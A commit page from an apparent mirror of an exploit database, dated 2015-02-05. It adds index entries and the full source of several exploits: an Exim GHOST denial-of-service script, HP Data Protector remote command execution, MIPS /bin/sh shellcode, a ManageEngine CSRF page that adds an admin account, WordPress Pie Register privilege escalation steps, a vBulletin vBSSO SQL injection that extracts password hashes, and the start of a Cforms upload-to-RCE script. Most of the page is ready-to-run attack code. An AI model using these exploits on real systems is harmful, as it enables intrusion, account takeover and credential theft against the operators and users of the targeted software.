bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

Update: 2015-02-05

Browse source 
30 new exploits
This commit is contained in:
Offensive Security 2015-02-05 08:37:11 +00:00
parent de65006749
commit 7fe14b4b98
31 changed files with 2295 additions and 1 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

32
files.csv
View file

@ -32268,6 +32268,8 @@ id,file,description,date,author,platform,type,port
35809,platforms/windows/remote/35809.c,"Microsoft Windows Live Messenger 14 'dwmapi.dll' DLL Loading Arbitrary Code Execution Vulnerability",2011-05-31,Kalashinkov3,windows,remote,0
35810,platforms/linux/remote/35810.txt,"libxmlInvalid 2.7.x XPath Multiple Memory Corruption Vulnerabilities",2011-05-31,"Chris Evans",linux,remote,0
35811,platforms/windows/local/35811.txt,"Windows < 8.1 (32/64 bit) - Privilege Escalation (User Profile Service) (MS15-003)",2015-01-18,"Google Security Research",windows,local,0
35812,platforms/windows/local/35812.py,"T-Mobile Internet Manager - SEH Buffer Overflow",2015-01-18,metacom,windows,local,0
35813,platforms/windows/local/35813.py,"Congstar Internet Manager - SEH Buffer Overflow",2015-01-18,metacom,windows,local,0
35814,platforms/php/webapps/35814.txt,"TEDE Simplificado v1.01/vS2.04 Multiple SQL Injection Vulnerabilities",2011-06-01,KnocKout,php,webapps,0
35815,platforms/php/webapps/35815.pl,"PikaCMS Multiple Local File Disclosure Vulnerabilities",2011-06-01,KnocKout,php,webapps,0
35816,platforms/php/webapps/35816.txt,"ARSC Really Simple Chat 3.3-rc2 Cross Site Scripting and Multiple SQL Injection Vulnerabilities",2011-06-01,"High-Tech Bridge SA",php,webapps,0
@ -32277,6 +32279,7 @@ id,file,description,date,author,platform,type,port
35820,platforms/linux/dos/35820.c,"Linux Kernel 2.6.x KSM Local Denial of Service Vulnerability",2011-06-02,"Andrea Righi",linux,dos,0
35821,platforms/windows/local/35821.txt,"Sim Editor 6.6 - Stack Based Buffer Overflow",2015-01-16,"Osanda Malith",windows,local,0
35822,platforms/windows/remote/35822.html,"Samsung SmartViewer BackupToAvi 3.0 - Remote Code Execution",2015-01-19,"Praveen Darshanam",windows,remote,0
35823,platforms/php/webapps/35823.txt,"Wordpress Pie Register Plugin 2.0.13 - Privilege Escalation",2015-01-16,"Kacper Szurek",php,webapps,80
35824,platforms/php/webapps/35824.txt,"vBulletin vBExperience 3 'sortorder' Parameter Cross Site Scripting Vulnerability",2011-06-06,Mr.ThieF,php,webapps,0
35826,platforms/php/webapps/35826.txt,"Joomla CCBoard SQL Injection and Arbitrary File Upload Vulnerabilities",2011-06-06,KedAns-Dz,php,webapps,0
35827,platforms/windows/dos/35827.py,"JetAudio 8.1.3 - (Corrupted mp4) Crash POC",2014-12-12,"Drozdova Liudmila",windows,dos,0
@ -32310,6 +32313,7 @@ id,file,description,date,author,platform,type,port
35857,platforms/php/webapps/35857.txt,"ArticleFR CMS 3.0.5 - SQL Injection Vulnerability",2015-01-21,TranDinhTien,php,webapps,0
35858,platforms/php/webapps/35858.txt,"ArticleFR CMS 3.0.5 - Arbitrary File Upload",2015-01-21,TranDinhTien,php,webapps,0
35859,platforms/hardware/dos/35859.py,"Zhone GPON 2520 R4.0.2.566b - Crash PoC",2015-01-21,"Kaczinski Ramirez",hardware,dos,0
35860,platforms/php/webapps/35860.txt,"vBulletin vBSSO Single Sign-On 1.4.14 - SQL Injection",2015-01-20,Technidev,php,webapps,80
35861,platforms/php/webapps/35861.txt,"vBTube 1.2.9 'vBTube.php' Multiple Cross Site Scripting Vulnerabilities",2011-06-14,Mr.ThieF,php,webapps,0
35862,platforms/php/webapps/35862.txt,"miniblog 1.0 Multiple Cross Site Scripting Vulnerabilities",2011-06-15,"High-Tech Bridge SA",php,webapps,0
35863,platforms/php/webapps/35863.php,"myBloggie 2.1.6 HTML-injection and SQL Injection Vulnerabilities",2011-06-15,"Robin Verton",php,webapps,0
@ -32317,6 +32321,7 @@ id,file,description,date,author,platform,type,port
35865,platforms/php/webapps/35865.txt,"Nibbleblog Multiple SQL Injection Vulnerabilities",2011-06-19,KedAns-Dz,php,webapps,0
35866,platforms/php/webapps/35866.txt,"Immophp 1.1.1 Cross Site Scripting and SQL Injection Vulnerabilities",2011-06-18,KedAns-Dz,php,webapps,0
35867,platforms/php/webapps/35867.txt,"Taha Portal 3.2 'sitemap.php' Cross Site Scripting Vulnerability",2011-06-18,Bl4ck.Viper,php,webapps,0
35868,platforms/linux/shellcode/35868.c,"Linux MIPS execve (36 bytes)",2015-01-22,Sanguine,linux,shellcode,0
35869,platforms/windows/dos/35869.txt,"Crystal Player 1.99 - Memory Corruption Vulnerability",2015-01-21,"Kapil Soni",windows,dos,0
35870,platforms/windows/dos/35870.rb,"Exif Pilot 4.7.2 - SEH Based Buffer Overflow",2015-01-22,"Osanda M. Jayathissa",windows,dos,0
35871,platforms/php/webapps/35871.txt,"Sitemagic CMS 2010.04.17 'SMExt' Parameter Cross Site Scripting Vulnerability",2011-06-21,"Gjoko Krstic",php,webapps,0
@ -32327,6 +32332,7 @@ id,file,description,date,author,platform,type,port
35876,platforms/windows/dos/35876.html,"Easewe FTP OCX ActiveX Control 4.5.0.9 'EaseWeFtp.ocx' Multiple Insecure Method Vulnerabilities",2011-06-22,"High-Tech Bridge SA",windows,dos,0
35877,platforms/php/webapps/35877.txt,"Sitemagic CMS 'SMTpl' Parameter Directory Traversal Vulnerability",2011-06-23,"Andrea Bocchetti",php,webapps,0
35878,platforms/php/webapps/35878.txt,"ecommerceMajor - SQL Injection And Authentication bypass",2015-01-22,"Manish Tanwar",php,webapps,0
35879,platforms/php/webapps/35879.txt,"Wordpress Cforms Plugin 14.7 - Remote Code Execution",2015-01-19,Zakhar,php,webapps,0
35880,platforms/windows/remote/35880.html,"LEADTOOLS Imaging LEADSmtp ActiveX Control 'SaveMessage()' Insecure Method Vulnerability",2011-06-23,"High-Tech Bridge SA",windows,remote,0
35881,platforms/windows/remote/35881.c,"xAurora 10.00 'RSRC32.DLL' DLL Loading Arbitrary Code Execution Vulnerability",2011-06-24,"Zer0 Thunder",windows,remote,0
35882,platforms/php/webapps/35882.txt,"Nodesforum '_nodesforum_node' Parameter SQL Injection Vulnerability",2011-06-23,"Andrea Bocchetti",php,webapps,0
@ -32335,6 +32341,7 @@ id,file,description,date,author,platform,type,port
35885,platforms/windows/remote/35885.txt,"Ubisoft CoGSManager ActiveX Control 1.0.0.23 'Initialize()' Method Stack Buffer Overflow Vulnerability",2011-06-27,"Luigi Auriemma",windows,remote,0
35886,platforms/windows/remote/35886.txt,"Sybase Advantage Server 10.0.0.3 'ADS' Process Off By One Buffer Overflow Vulnerability",2011-06-27,"Luigi Auriemma",windows,remote,0
35887,platforms/hardware/remote/35887.txt,"Cisco Ironport Appliances - Privilege Escalation Vulnerability",2015-01-22,"Glafkos Charalambous ",hardware,remote,0
35889,platforms/windows/dos/35889.py,"IceCream Ebook Reader 1.41 - Crash PoC",2015-01-23,"Kapil Soni",windows,dos,0
35890,platforms/jsp/webapps/35890.txt,"ManageEngine ServiceDesk Plus 9.0 - SQL Injection Vulnerability",2015-01-22,"Muhammad Ahmed Siddiqui",jsp,webapps,0
35891,platforms/jsp/webapps/35891.txt,"ManageEngine ServiceDesk Plus 9.0 - User Enumeration Vulnerability",2015-01-22,"Muhammad Ahmed Siddiqui",jsp,webapps,8080
35892,platforms/multiple/remote/35892.txt,"MySQLDriverCS 4.0.1 SQL Injection Vulnerability",2011-06-27,"Qihan Luo",multiple,remote,0
@ -32357,6 +32364,7 @@ id,file,description,date,author,platform,type,port
35913,platforms/android/dos/35913.txt,"Android WiFi-Direct Denial of Service",2015-01-26,"Core Security",android,dos,0
35914,platforms/php/webapps/35914.txt,"ferretCMS 1.0.4-alpha - Multiple Vulnerabilities",2015-01-26,"Steffen Rösemann",php,webapps,80
35915,platforms/multiple/webapps/35915.txt,"Symantec Data Center Security - Multiple Vulnerabilities",2015-01-26,"SEC Consult",multiple,webapps,0
35916,platforms/php/webapps/35916.txt,"Wordpress Photo Gallery Plugin 1.2.5 - Unrestricted File Upload",2014-11-11,"Kacper Szurek",php,webapps,80
35917,platforms/hardware/remote/35917.txt,"D-Link DSL-2740R - Unauthenticated Remote DNS Change Exploit",2015-01-27,"Todor Donev",hardware,remote,0
35918,platforms/multiple/remote/35918.c,"IBM DB2 'DT_RPATH' Insecure Library Loading Arbitrary Code Execution Vulnerability",2011-06-30,"Tim Brown",multiple,remote,0
35919,platforms/bsd/remote/35919.c,"NetBSD 5.1 Multiple 'libc/net' Functions Stack Buffer Overflow Vulnerability",2011-07-01,"Maksymilian Arciemowicz",bsd,remote,0
@ -32387,7 +32395,11 @@ id,file,description,date,author,platform,type,port
35945,platforms/php/webapps/35945.txt,"Chyrp 2.x URI action Parameter Traversal Local File Inclusion",2011-07-29,Wireghoul,php,webapps,0
35946,platforms/php/webapps/35946.txt,"Chyrp 2.x includes/lib/gz.php file Parameter Traversal Arbitrary File Access",2011-07-29,Wireghoul,php,webapps,0
35947,platforms/php/webapps/35947.txt,"Chyrp 2.x swfupload Extension upload_handler.php File Upload Arbitrary PHP Code Execution",2011-07-29,Wireghoul,php,webapps,0
35953,platforms/windows/local/35953.c,"McAfee Data Loss Prevention Endpoint - Arbitrary Write Privilege Escalation",2015-01-30,ParvezGHH,windows,local,0
35948,platforms/windows/remote/35948.html,"X360 VideoPlayer ActiveX Control 2.6 - Full ASLR & DEP Bypass",2015-01-30,Rh0,windows,remote,0
35949,platforms/windows/remote/35949.txt,"Symantec Encryption Management Server < 3.2.0 MP6 - Remote Command Injection",2015-01-30,"Paul Craig",windows,remote,0
35950,platforms/php/webapps/35950.txt,"NPDS CMS Revolution-13 - SQL Injection Vulnerability",2015-01-24,"Narendra Bhati",php,webapps,80
35951,platforms/linux/dos/35951.py,"Exim ESMTP 4.80 glibc gethostbyname - Denial of Service",2015-01-29,1n3,linux,dos,0
35953,platforms/windows/local/35953.c,"McAfee Data Loss Prevention Endpoint - Arbitrary Write Privilege Escalation",2015-01-30,"Parvez Anwar",windows,local,0
35954,platforms/php/webapps/35954.txt,"Auto Web Toolbox 'id' Parameter SQL Injection Vulnerability",2011-07-15,Lazmania61,php,webapps,0
35955,platforms/php/webapps/35955.txt,"Easy Estate Rental 's_location' Parameter SQL Injection Vulnerability",2011-07-15,Lazmania61,php,webapps,0
35956,platforms/php/webapps/35956.txt,"Joomla Foto Component 'id_categoria' Parameter SQL Injection Vulnerability",2011-07-15,SOLVER,php,webapps,0
@ -32395,6 +32407,9 @@ id,file,description,date,author,platform,type,port
35958,platforms/php/webapps/35958.txt,"Joomla Juicy Gallery Component 'picId' Parameter SQL Injection Vulnerability",2011-07-15,SOLVER,php,webapps,0
35959,platforms/php/webapps/35959.txt,"Joomla! 'com_hospital' Component SQL Injection Vulnerability",2011-07-15,SOLVER,php,webapps,0
35960,platforms/php/webapps/35960.txt,"Joomla Controller Component 'Itemid' Parameter SQL Injection Vulnerability",2011-07-15,SOLVER,php,webapps,0
35961,platforms/linux/remote/35961.py,"HP Data Protector 8.x - Remote Command Execution",2015-01-30,"Juttikhun Khamchaiyaphum",linux,remote,0
35962,platforms/windows/local/35962.c,"Trend Micro Multiple Products 8.0.1133 - Privilege Escalation",2015-01-31,"Parvez Anwar",windows,local,0
35964,platforms/windows/local/35964.c,"Symantec Altiris Agent 6.9 (Build 648) - Privilege Escalation",2015-02-01,"Parvez Anwar",windows,local,0
35965,platforms/php/webapps/35965.txt,"Joomla! 'com_resman' Component Cross Site Scripting Vulnerability",2011-07-15,SOLVER,php,webapps,0
35966,platforms/php/webapps/35966.txt,"Joomla! 'com_newssearch' Component SQL Injection Vulnerability",2011-07-15,"Robert Cooper",php,webapps,0
35967,platforms/php/webapps/35967.txt,"AJ Classifieds 'listingid' Parameter SQL Injection Vulnerability",2011-07-15,Lazmania61,php,webapps,0
@ -32405,3 +32420,18 @@ id,file,description,date,author,platform,type,port
35972,platforms/php/webapps/35972.txt,"Sefrengo CMS 1.6.1 - Multiple SQL Injection Vulnerabilities",2015-02-02,"ITAS Team",php,webapps,0
35973,platforms/php/webapps/35973.txt,"Joomla! 1.6.5 and Prior Multiple Cross Site Scripting Vulnerabilities",2011-07-20,"YGN Ethical Hacker Group",php,webapps,0
35974,platforms/php/webapps/35974.txt,"Tiki Wiki CMS Groupware <= 7.2 'snarf_ajax.php' Cross Site Scripting Vulnerability",2011-07-20,"High-Tech Bridge SA",php,webapps,0
35975,platforms/php/webapps/35975.txt,"Cyberoam UTM Multiple Cross Site Scripting Vulnerabilities",2011-07-20,"Patrick Webster",php,webapps,0
35976,platforms/php/webapps/35976.txt,"Synergy Software 'id' Parameter SQL Injection Vulnerability",2011-07-21,Ehsan_Hp200,php,webapps,0
35977,platforms/php/webapps/35977.txt,"Godly Forums 'id' Parameter SQL Injection Vulnerability",2011-07-25,3spi0n,php,webapps,0
35978,platforms/php/webapps/35978.txt,"Online Grades 3.2.5 Multiple Cross Site Scripting Vulnerabilities",2011-07-25,"Gjoko Krstic",php,webapps,0
35979,platforms/php/webapps/35979.txt,"Willscript Recipes Website Script Silver Edition 'viewRecipe.php' SQL Injection Vulnerability",2011-07-25,Lazmania61,php,webapps,0
35980,platforms/multiple/webapps/35980.html,"ManageEngine Desktop Central 9 Build 90087 - CSRF Vulnerability",2015-02-03,"Mohamed Idris",multiple,webapps,8020
35982,platforms/windows/webapps/35982.txt,"Hewlett-Packard UCMDB - JMX-Console Authentication Bypass",2015-02-03,"Hans-Martin Muench",windows,webapps,8080
35983,platforms/windows/local/35983.rb,"MS15-004 Microsoft Remote Desktop Services Web Proxy IE Sandbox Escape",2015-02-03,metasploit,windows,local,0
35984,platforms/php/webapps/35984.txt,"Joomla! Virtual Money 1.5 'com_virtualmoney' Component SQL Injection Vulnerability",2011-07-25,FL0RiX,php,webapps,0
35985,platforms/php/webapps/35985.txt,"Support Incident Tracker (SiT!) 3.63 p1 report_marketing.php exc[] Parameter SQL Injection",2011-07-26,"Yuri Goltsev",php,webapps,0
35986,platforms/php/webapps/35986.txt,"Support Incident Tracker (SiT!) 3.63 p1 billable_incidents.php sites[] Parameter SQL Injection",2011-07-26,"Yuri Goltsev",php,webapps,0
35987,platforms/php/webapps/35987.txt,"Support Incident Tracker (SiT!) 3.63 p1 search.php search_string Parameter SQL Injection",2011-07-26,"Yuri Goltsev",php,webapps,0
35988,platforms/php/webapps/35988.txt,"Support Incident Tracker (SiT!) 3.63 p1 tasks.php selected[] Parameter SQL Injection",2011-07-26,"Yuri Goltsev",php,webapps,0
35989,platforms/php/webapps/35989.txt,"MBoard 1.3 'url' Parameter URI Redirection Vulnerability",2011-07-27,"High-Tech Bridge SA",php,webapps,0
35990,platforms/php/webapps/35990.txt,"PHPJunkYard GBook 1.6/1.7 Multiple Cross Site Scripting Vulnerabilities",2011-07-27,"High-Tech Bridge SA",php,webapps,0

Can't render this file because it is too large.

61
platforms/linux/dos/35951.py Executable file
View file

@ -0,0 +1,61 @@
# Exploit Title: [Exim ESMTP GHOST DoS PoC Exploit]
# Date: [1/29/2015]
# Exploit Author: [1N3]
# Vendor Homepage: [www.exim.org]
# Version: [4.80 or less]
# Tested on: [debian-7-7-64b]
# CVE : [2015-0235]
#!/usr/bin/python
# Exim ESMTP DoS Exploit by 1N3 v20150128
# CVE-2015-0235 GHOST glibc gethostbyname buffer overflow
# http://crowdshield.com
#
# USAGE: python ghost-smtp-dos.py <ip> <port>
#
# Escape character is '^]'.
# 220 debian-7-7-64b ESMTP Exim 4.80 ...
# HELO
# 0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
# Connection closed by foreign host.
#
# user () debian-7-7-64b:~$ dmesg
# ...
# [ 1715.842547] exim4[2562]: segfault at 7fabf1f0ecb8 ip 00007fabef31bd04 sp 00007fffb427d5b0 error 6 in
# libc-2.13.so[7fabef2a2000+182000]
import socket
import time
import sys, getopt
def main(argv):
argc = len(argv)
if argc <= 1:
print "usage: %s <host>" % (argv[0])
sys.exit(0)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
buffer = "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000"
target = argv[1] # SET TARGET
port = argv[2] # SET PORT
print "(--==== Exim ESMTP DoS Exploit by 1N3 - https://crowdshield.com"
print "(--==== Sending GHOST SMTP DoS to " + target + ":" + port + " with length:" +str(len(buffer))
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=s.connect((target,int(port)))
data = s.recv(1024)
print "CONNECTION: " +data
s.send('HELO ' + buffer + '\r\n')
data = s.recv(1024)
print "received: " +data
s.send('EHLO ' + buffer + '\r\n')
data = s.recv(1024)
print "received: " +data
s.close()
main(sys.argv)

69
platforms/linux/remote/35961.py Executable file
View file

@ -0,0 +1,69 @@
#!/usr/bin/python
# Exploit Title: HP-Data-Protector-8.x Remote command execution.
# Google Dork: -
# Date: 30/01/2015
# Exploit Author: Juttikhun Khamchaiyaphum
# Vendor Homepage: https://h20564.www2.hp.com/hpsc/doc/public/display?docId=emr_na-c04373818
# Software Link: http://www8.hp.com/th/en/software-solutions/data-protector-backup-recovery-software/
# Version: 8.x
# Tested on: IA64 HP Server Rx3600
# CVE : CVE-2014-2623
# Usage: hp_data_protector_8_x.py <target ip> <port> <command e.g. "uname -m">"
import socket
import struct
import sys
def exploit(host, port, command):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
sock.connect((host, port))
print "[+] Target connected."
OFFSET_DEC_START = 133
OFFSET_DEC = (OFFSET_DEC_START + len(command))
# print "OFFSET_DEC_START:" + str(OFFSET_DEC_START)
# print "len(command)" + str(len(command))
# print "OFFSET_DEC" + str(OFFSET_DEC)
OFFSET_HEX = "%x" % OFFSET_DEC
# print "OFFSET_HEX" + str(OFFSET_HEX)
OFFSET_USE = chr(OFFSET_DEC)
# print "Command Length: " + str(len(command))
PACKET_DATA = "\x00\x00\x00"+\
OFFSET_USE+\
"\x20\x32\x00\x20\x73\x73\x73\x73\x73\x73\x00\x20\x30" + \
"\x00\x20\x54\x45\x53\x54\x45\x52\x00\x20\x74\x65\x73\x74\x65\x72\x00" + \
"\x20\x43\x00\x20\x32\x30\x00\x20\x74\x65\x73\x65\x72\x74\x65\x73\x74" + \
"\x2E\x65\x78\x65\x00\x20\x72\x65\x73\x65\x61\x72\x63\x68\x00\x20\x2F" + \
"\x64\x65\x76\x2F\x6E\x75\x6C\x6C\x00\x20\x2F\x64\x65\x76\x2F\x6E\x75" + \
"\x6C\x6C\x00\x20\x2F\x64\x65\x76\x2F\x6E\x75\x6C\x6C\x00\x20\x30\x00" + \
"\x20\x32\x00\x20\x75\x74\x69\x6C\x6E\x73\x2F\x64\x65\x74\x61\x63\x68" + \
"\x00\x20\x2D\x64\x69\x72\x20\x2F\x62\x69\x6E\x20\x2D\x63\x6F\x6D\x20" + \
" %s\x00" %command
# Send payload to target
print "[+] Sending PACKET_DATA"
sock.sendall(PACKET_DATA)
# Parse the response back
print "[*] Result:"
while True:
response = sock.recv(2048)
if not response: break
print response
except Exception as ex:
print >> sys.stderr, "[-] Socket error: \n\t%s" % ex
exit(-3)
sock.close()
if __name__ == "__main__":
try:
target = sys.argv[1]
port = int(sys.argv[2])
command = sys.argv[3]
exploit(target, port, command)
except IndexError:
print("Usage: hp_data_protector_8_x.py <target ip> <port> <command e.g. \"uname -m\">")
exit(0)

47
platforms/linux/shellcode/35868.c Executable file
View file

@ -0,0 +1,47 @@
# Exploit Title: 36byte Linux MIPS execve
# Date: 2015 - 1 - 20
# Exploit Author: Sanguine
# Vendor Homepage: http://sangu1ne.tistory.com/
#include <stdio.h>
/*
Sanguine@debian-mipsel:~/leaveret# cat > MIPS_36b_sc.s
.section .text
.globl __start
.set noreorder
__start:
slti $a2, $zero, -1 #set a1 to zero
p:
bltzal $a2, p #not branch always and save ra
slti $a1, $zero, -1 #set a1 to zero
addu $a0, $ra, 4097 #a0 + 16
addu $a0, $a0, -4081
li $v0, 4011
syscall 0x40404
.string "/bin/sh"
Sanguine@debian-mipsel:~/leaveret# as MIPS_36b_sc.s -o MIPS_36b_sc.o
Sanguine@debian-mipsel:~/leaveret# ld MIPS_36b_sc.o -o MIPS_36b_sc
Sanguine@debian-mipsel:~/leaveret# ./MIPS_36b_sc
$ exit
*/
char sc[] = {
"\xff\xff\x06\x28" /* slti $a2, $zero, -1 */
"\xff\xff\xd0\x04" /* bltzal $a2, <p> */
"\xff\xff\x05\x28" /* slti $a1, $zero, -1 */
"\x01\x10\xe4\x27" /* addu $a0, $ra, 4097 */
"\x0f\xf0\x84\x24" /* addu $a0, $a0, -4081 */
"\xab\x0f\x02\x24" /* li $v0, 4011 */
"\x0c\x01\x01\x01" /* syscall 0x40404 */
"/bin/sh"
};
void
main(void)
{
void (*s)(void);
printf("sc size %d\n", sizeof(sc));
s = sc;
s();
}

45
platforms/multiple/webapps/35980.html Executable file
View file

@ -0,0 +1,45 @@
<html>
<!--
# Exploit Title: ManageEngine Desktop Central 9 Add and admin user through Cross-Site Request Forgery (CSRF)
# Date: 05 December 2014
# Exploit Author: Mohamed Idris Help AG Middle East
# Vendor Homepage: http://www.manageengine.com/
# Software Link: http://www.manageengine.com/products/desktop-central/
# Version: All versions below build 90121
# Tested on: Version 9 Build 90087
# CVEID: CVE-2014-9331
# Vulnerability Fix: http://www.manageengine.com/products/desktop-central/cve20149331-cross-site-request-forgery.html
POC Code:
When an authenticated application admin clicks a link to the below code, you well get a user “Hacker” with the password “HackerPass” added to the application (convincing the admin to click on a link is so easy ;)).
Remember to change the IP to the target server IP address in the code.
-->
<!-- CSRF PoC - Add an admin account -->
<body>
<form action="http://<Server-IP>:8020/STATE_ID/1417736606982/roleMgmt.do?actionToCall=addUser&SUBREQUEST=XMLHTTP" method="POST">
<input type="hidden" name="AuthenticationType" value="DC" />
<input type="hidden" name="newDCAuthUserName" value="Hacker" />
<input type="hidden" name="newDCAuthUserPassword" value="HackerPass" />
<input type="hidden" name="DCAuthconfirmPassword" value="HackerPass" />
<input type="hidden" name="newDCAuthUserEmail" value="" />
<input type="hidden" name="newDCAuthUserPNumber" value="" />
<input type="hidden" name="newADAuthUserEmail" value="" />
<input type="hidden" name="newADAuthUserPNumber" value="" />
<input type="hidden" name="MapType" value="ALL" />
<input type="hidden" name="aduserSearch" value="" />
<input type="hidden" name="searchValue" value="Search" />
<input type="hidden" name="aduserSearchRO" value="" />
<input type="hidden" name="searchValue" value="Search" />
<input type="hidden" name="action1" value="DC_ADD_USER" />
<input type="hidden" name="addUser" value="Add User" />
<input type="hidden" name="cancle" value="Cancel" />
<input type="hidden" name="customerids" value="" />
<input type="hidden" name="roleListDCAuth" value="1" />
<input type="hidden" name="PERSONALISE_LANGUAGE" value="en_US" />
<input type="hidden" name="domainListADAuth" value="-1" />
<input type="hidden" name="roleListADAuth" value="-1" />
<input type="hidden" name="PERSONALISE_LANGUAGE" value="en_US" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>

61
platforms/php/webapps/35823.txt Executable file
View file

@ -0,0 +1,61 @@
# Exploit Title: Pie Register 2.0.13 Privilege escalation
# Date: 16-10-2014
# Software Link: https://wordpress.org/plugins/pie-register/
# Exploit Author: Kacper Szurek
# Contact: http://twitter.com/KacperSzurek
# Website: http://security.szurek.pl/
# CVE: CVE-2014-8802
# Category: webapps
1. Description
Anyone can import CSV file. Pie Register will import users from this file.
File: pie-register\pie-register.php
add_action( 'init', array($this,'pie_main') );
function pie_main() {
// I skip unnecessary lines
if(isset($_FILES['csvfile']['name'])) {
$this->importUsers();
}
}
http://security.szurek.pl/pie-register-2013-privilege-escalation.html
2. Proof of Concept
Create CSV file based on given example:
"Username","Display name","E-mail","User Registered","First Name","Last Name","Nickname","Role"
"hack","Hacked","hacked@hacked.hacked","2010-10-10 20:00:00","Hacked","Hacked","Hacked","administrator"
Import account using:
<form method="post" action="http://wordpress-instalation" enctype="multipart/form-data">
Input CSV<input type="file" name="csvfile">
<input type="submit" value="Add user!">
</form>
Create another standard account using wp-login.php?action=register.
After login go to wp-admin/profile.php and search "uid" in page source.
Number after "uid" is our current account id. For example: "uid":"123".
We can assume that previously imported admin account has id-1 (or id-x where x is natural number).
We can activate this account using:
<form method="post" action="http://wordpress-instalation">
<input type="hidden" name="verifyit" value="1">
Account id:<input type="text" name="vusers[]" value="">
<input type="submit" value="Activate user!">
</form>
Finally we can reset password using: http://wordpress-instalation/wp-login.php?action=lostpassword
3. Solution:
Update to version 2.0.14
https://downloads.wordpress.org/plugin/pie-register.2.0.14.zip

36
platforms/php/webapps/35860.txt Executable file
View file

@ -0,0 +1,36 @@
# Exploit Title: vBulletin vBSSO Single Sign-On <= 1.4.14 SQL Injection
# Date: January 20, 2015
# Exploit Author: Technidev (https://technidev.com)
# Vendor Homepage: https://vbulletin.com
# Software Link: http://www.vbulletin.org/forum/showthread.php?t=270517
# Version: <= 1.4.14, patched in >= 1.4.15
This plugin is vulnerable to SQL injection at the /vbsso/avatar.php file
in the fetchUserinfo function.
It requires a big UNION ALL SELECT query and commenting out the LIMIT
function of SQL. If SQL injection is a success, the browser will
redirect the user to a URL where the URL contains the extracted information.
To exploit this, you need to execute a rather large UNION ALL SELECT
query like this:
http://example.com/vbsso/vbsso.php?a=act&do=avatar&id=' or user.userid =
1 UNION ALL SELECT userfield.*, usertextfield.*, user.*,
usergroup.genericpermissions, UNIX_TIMESTAMP(passworddate) AS
passworddate, IF(displaygroupid=0, user.usergroupid, displaygroupid) AS
displaygroupid, concat(user.password, 0x3a, user.salt) AS avatarpath,
NOT ISNULL(customavatar.userid) AS hascustomavatar,
customavatar.dateline AS avatardateline, customavatar.width AS avwidth,
customavatar.height AS avheight, customavatar.height_thumb AS
avheight_thumb, customavatar.width_thumb AS avwidth_thumb,
customavatar.filedata_thumb FROM user AS user LEFT JOIN userfield AS
userfield ON (user.userid = userfield.userid) LEFT JOIN usergroup AS
usergroup ON (usergroup.usergroupid = user.usergroupid) LEFT JOIN
usertextfield AS usertextfield ON (usertextfield.userid = user.userid)
LEFT JOIN avatar AS avatar ON (avatar.avatarid = user.avatarid) LEFT
JOIN customavatar AS customavatar ON (customavatar.userid = user.userid)
WHERE user.userid = 1 ORDER BY avatarpath DESC%23
For example, by visiting this URL on a vulnerable forum, you will be
redirected to
http://example.com/9d0d647f535a4c1f493eabf3d69ca89a:nO^sh9;TVNxGJ”X+3cYkq9Z4Cd3WS
which obviously contains the hash and salt of userid 1.

112
platforms/php/webapps/35879.txt Executable file
View file

@ -0,0 +1,112 @@
# Exploit Title: Remote Code Execution via Unauthorised File upload in Cforms 14.7
# Date: 2015-01-19
# Exploit Author: Zakhar
# Vendor Homepage: https://wordpress.org/plugins/cforms2/
# Software Link: https://downloads.wordpress.org/plugin/cforms2.zip
# Version: 14.7
# Tested on: Wordpress 4.0
# CVE : 2014-9473
import os
import requests
import re
import base64
import sys
from lxml import etree
from optparse import OptionParser
def main():
print 'Cforms II File Upload + Remote Code Execution\n'
text = 'Test text'
text_mail = 'test@mail.com'
parser = OptionParser()
parser.add_option("-f", "--file", dest="file", help="file to upload", default = "itest.php", metavar="FILE")
parser.add_option("-i", "--max-iterations", dest="iterations", help="Numbe of fields to iterate", default = "10")
parser.add_option("-b", "--upload-file-name-bruteforce", dest="brute", help="Uploaded file name brute force", default = "10")
parser.add_option("-n", "--cforms-form-number", dest="number", help="Cforms form number", default = "")
parser.add_option("-c", "--cforms-home-dir", dest="home", help="Cforms form home dir", default = "/wp-content/plugins/cforms2/")
parser.add_option("-u", "--url", dest="url", help="vulnerable url with contact form, example: http://127.0.0.1/Contact/")
(opt, args) = parser.parse_args()
options = opt.__dict__
if not opt.url: # if url is not given
parser.error('URL not given')
if not opt.file:
parser.error('file not given')
filename = options["file"]
if os.path.isfile(filename) is not True:
print 'No such file '+filename
return 0
url = options['url']
home = options["home"]
i = options["iterations"]
n = options["number"]
b = options["brute"]
s = requests.Session()
r = s.get(url)
if r.status_code != requests.codes.ok:
print 'Error: website not found.'
return 0
tree = etree.HTML(r.text)
# get cforms id
if n is "":
for x in xrange(2,10):
for node in tree.xpath('//*[@id="cforms'+str(x)+'form"]'):
if node is not None:
